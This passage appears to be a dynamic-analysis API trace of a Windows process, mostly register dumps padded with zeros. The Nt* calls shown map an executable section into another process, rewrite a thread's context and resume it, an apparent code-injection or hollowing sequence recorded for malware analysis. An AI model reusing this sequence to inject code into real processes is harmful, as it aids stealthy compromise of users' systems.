Eax=0x1, Ebp=0x19febc, Eip=0x7567895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0171.058] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x140) returned 0x0 [0171.058] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0xba200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0xbb000) returned 0x0 [0171.062] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xb4, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0xba200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x640000, SectionOffset=0x0, ViewSize=0xde6e8*=0xbb000) returned 0x0 [0171.075] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0171.078] NtClose (Handle=0x140) returned 0x0 [0171.078] NtSetContextThread (ThreadHandle=0x138, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x369000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x667707, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0171.083] NtResumeThread (in: ThreadHandle=0x138, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0171.084] NtClose (Handle=0xb4) returned 0x0 [0171.084] NtClose (Handle=0x138) returned 0x0 [0171.084] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x1034, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x138) returned 0x0 [0171.085] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0171.085] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0171.085] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x23d000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0171.085] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0171.088] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x1038) | out: ThreadHandle=0xdea64*=0xb4) returned 0x0 [0171.088] NtSuspendThread (in: ThreadHandle=0xb4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0171.088] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0x138, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x27d0000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0171.115] NtGetContextThread (in: ThreadHandle=0xb4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x23d000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7567895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, 